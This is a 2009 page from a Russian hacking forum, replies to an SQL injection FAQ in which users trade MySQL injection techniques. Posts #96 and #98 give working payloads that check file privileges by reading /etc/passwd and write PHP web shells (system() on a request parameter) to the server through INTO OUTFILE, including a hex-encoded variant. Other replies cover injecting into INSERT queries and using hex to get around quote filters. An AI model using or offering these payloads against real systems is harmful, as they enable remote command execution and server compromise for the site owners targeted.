ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #91  
Старый 20.04.2009, 17:11
Аватар для Yosch23
Yosch23
Новичок
Регистрация: 24.01.2009
Сообщений: 5
Провел на форуме:
11244

Репутация: 1
По умолчанию

fker нет... после = подставлял сразу то что ты говорил и ничего не вышло ну тоесть всё нормально выводил =471+or+1=2-- и =471+order+by+1-- одинаково выводит текст... а вот если подставить перед 471 минус и например +or+1=1-- то текст не выводиться...
 
Ответить с цитированием

  #92  
Старый 01.06.2009, 16:59
Аватар для Юльча
Юльча
Новичок
Регистрация: 28.09.2007
Сообщений: 3
Провел на форуме:
146913

Репутация: 1
По умолчанию

Спасибо за FAQ!

Можно ли что-то сделать, если запрос в коде не
Код:
SELECT tabl  FROM ...
(во всех примерах был только select )

а типа:
Код:
INSERT tabl (id, name) VALUES ('$id', '$name')
$id ни как не проверяется

?
 
Ответить с цитированием

  #93  
Старый 01.06.2009, 17:57
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Сообщение от Юльча  
Спасибо за FAQ!

Можно ли что-то сделать, если запрос в коде не
Код:
SELECT tabl  FROM ...
(во всех примерах был только select )

а типа:
Код:
INSERT tabl (id, name) VALUES ('$id', '$name')
$id ни как не проверяется

?
Смотря что тебе надо. Но только добавление записи.
123', '321')--+
__________________
..
 
Ответить с цитированием

  #94  
Старый 01.06.2009, 18:21
Аватар для Юльча
Юльча
Новичок
Регистрация: 28.09.2007
Сообщений: 3
Провел на форуме:
146913

Репутация: 1
По умолчанию

Цитата:
Смотря что тебе надо
Хотелось бы SQL injection

Но проблема в том что mysql_query обрабатывает только один запрос.
т.е. кроме как вставить в эту таблицу чепуху не выходит.

Хочу узнать можно ли както использовать недочет такого кода
 
Ответить с цитированием

  #95  
Старый 01.06.2009, 19:09
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Цитата:
Сообщение от Юльча  
Хочу узнать можно ли както использовать недочет такого кода
Можешь работать как с Blind SQL Inj, через more1row вот как тут (пункт 4): https://forum.antichat.ru/thread35207.html

З.Ы.
Почитай заодно: https://forum.antichat.ru/thread119047.html
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #96  
Старый 01.06.2009, 19:53
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

[небольшая заметка о залитии файлов в слепых инъекциях]

Посмотрев в интернете информацию по данному вопросу и ничего не найдя, решил поделиться с вами, дорогие друзья, своими мыслями...
Начнем с проверки прав, дабы убедиться, что у нас есть file_priv:
Код:
id=1+and+1=if(load_file('/etc/passwd')+is+not+NULL,1,2)--+
Если все ровно и нет никаких ошибок, следующим запросом льем шелл:
Код:
1+and+if((select+"<?php system($_REQUEST[c]); ?>"+into+outfile+'/tmp/test.txt'),1,2)=1--
Можно также проверить залился ли файл, как мы проверяли наличие file_priv:
Код:
id=1+and+1=(if(load_file('/tmp/test.txt')+is+not+NULL,1,2)--+
Плюс вышеописанной конструкции заключается в том, что где бы инъект не был, в операторе SELECT, UPDATE, INSERT и т.д., при присутствии file_priv и отсутствии magic_quotes, шелл будет литься.

[BONUS]
Продолжим мысль и придумаем еще одно применение данной конструкции....
Надеюсь все читали про способ заливки шелла через инъекции, даже с присутствием magic_quotes, посредством двойного запроса...
Так вот, чтобы залить шелл необходимо было ордер баем вычислять кол-во колонок, участвующих во втором(вложенном) запросе.
Использую же вышеописанную технику, можно сократить время подбора колонок(имхо, довольно существенно, потому что когда подбираешь кол-во, приходится каждый раз хексить внутренний запрос)

Хексим:
Код:
0x2D3120616E64206966282873656C65637420223C3F7068702073797374656D28245F524551554553545B635D293B203F3E2220696E746F206F757466696C6520272F746D702F746573742E74787427292C312C32293D312D2D20
(1 and if((select "<?php system($_REQUEST[c]); ?>" into outfile '/tmp/test.txt'),1,2)=1-- )
И подставляем сие чудо на место поля, учавствующего в двойном запросе...

Последний раз редактировалось Iceangel_; 26.08.2009 в 15:30..
 
Ответить с цитированием

  #97  
Старый 01.06.2009, 21:51
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Iceangel_, кстати все эти запросы можно совместить, если я не ошибаюсь. В один удобный запрос, который сделает всё
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #98  
Старый 02.06.2009, 01:07
Аватар для cr0w
cr0w
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме:
2753780

Репутация: 585
По умолчанию

[ + еще одна небольшая "фича" по теме залития шелла через SQL Injection ]

Не уверен, что тут уже не писали о подобном способе аплоада шелла, но вроде пока не находил. Возможно, пригодится кому-то:
Код:
id=1+limit+1+into+outfile+'/path/to/shell.php'+fields+terminated+by+''+optionally+enclosed+by+"<?php+system($_GET[c]);die();?>"--+
Т.е. если инъекция в аргументе WHERE (или в LIMIT'е, или в ORDER BY, etc) SELECT-запроса, то можно сразу сделать вывод в файл без UNION'а или подзапросов. Зачем там die() сами догадайтесь. (;

add: Ну или даже удобнее так:
Код:
id=1+limit+1+into+outfile+'/path/to/shell.php'+lines+terminated+by+"<?php+system($_GET[c]);?>"--+
Вобщем, тут возможны вариации.

Последний раз редактировалось cr0w; 07.06.2009 в 01:50..
 
Ответить с цитированием

  #99  
Старый 04.06.2009, 18:42
Аватар для Sonsee
Sonsee
Новичок
Регистрация: 03.06.2009
Сообщений: 1
Провел на форуме:
1330

Репутация: 0
По умолчанию

спасибо за подробную статью, очень удобный фак. Единственное, что мне кажеться ты забыл упамянуть, это то, что если в HEX переводятся значения, то это спасает от фильтрации кавычек и их не нужно указывать. Как к примеру - FROM INFO.._SCHEMA.TABLES WHERE=0xимятаблицы_в_хексе. Я использовал этот, чтоб научиться и понять как это делается, единственное, что начал тулить туда кавычки к хексу, и сначала не дошло почему мускул ругается...
 
Ответить с цитированием

  #100  
Старый 04.06.2009, 19:00
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Пункт 4.2 Фильтруется символ/строка, там как раз про hex
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ